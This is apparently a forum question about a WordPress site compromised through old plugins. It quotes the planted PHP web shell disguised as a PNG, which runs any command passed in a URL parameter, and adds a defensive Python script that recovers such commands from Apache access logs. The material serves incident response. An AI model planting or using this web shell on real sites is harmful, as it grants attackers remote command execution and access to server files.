Backdoor exploit – could they have downloaded files from server?

Due to a customer running old WordPress plugins, a PHP file with the following code was added to their website:

‰PNG <?php $str = $_GET['cmd']; system($str); ?>

The above file was detected by Wordfence as "Backdoor:PNG/ImageMagic.7484 Executable code masquerading as an image."

This (or another exploit) appears to have given the intruder the ability to at least upload files, as text files containing the words "Hacked by …" were added to various places on the server.

Using this exploit, what kind of access would be allowed onto the server besides the ability to upload files? Could they have also downloaded files from anywhere on the server?

We are running a cPanel environment on Apache, MySQL and PHP.
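
Added example, not part of the original post: the file shown above takes its command from the "cmd" GET parameter, so each command sent this way sits in the request URL that Apache writes to its combined-format access log, and can be recovered from there. The sketch below extracts those requests; the log lines, IP addresses, date and the file name shell.png.php are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges, hypothetical file name).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2019:04:11:02 +0000] "GET /wp-content/uploads/shell.png.php?cmd=id HTTP/1.1" 200 61 "-" "curl/7.58.0"
203.0.113.7 - - [12/Mar/2019:04:11:09 +0000] "GET /wp-content/uploads/shell.png.php?cmd=ls%20-la HTTP/1.1" 200 1874 "-" "curl/7.58.0"
198.51.100.23 - - [12/Mar/2019:04:12:30 +0000] "GET /index.php?p=12 HTTP/1.1" 200 15320 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2019:04:13:44 +0000] "GET /wp-content/uploads/shell.png.php HTTP/1.1" 200 9 "-" "curl/7.58.0"
"""

def find_cmd_requests(log_text, param="cmd"):
    """Return one dict per logged request that carried the backdoor's GET parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        values = parse_qs(url.query, keep_blank_values=True).get(param)
        if values is None:
            continue  # request did not carry the parameter
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "path": url.path,
            "command": values[0],  # parse_qs has already URL-decoded it
            "status": int(m["status"]),
            # %b in the log: response body size, i.e. how much output was returned
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
        })
    return hits

if __name__ == "__main__":
    for h in find_cmd_requests(SAMPLE_LOG):
        print(f'{h["time"]}  {h["ip"]}  {h["path"]}  '
              f'{h["status"]}  {h["bytes"]}B  {h["command"]!r}')
```

The access log records only the URL, so commands delivered by any other route (for example a POST body to a different script) will not show up here, and an empty result does not prove that nothing was run.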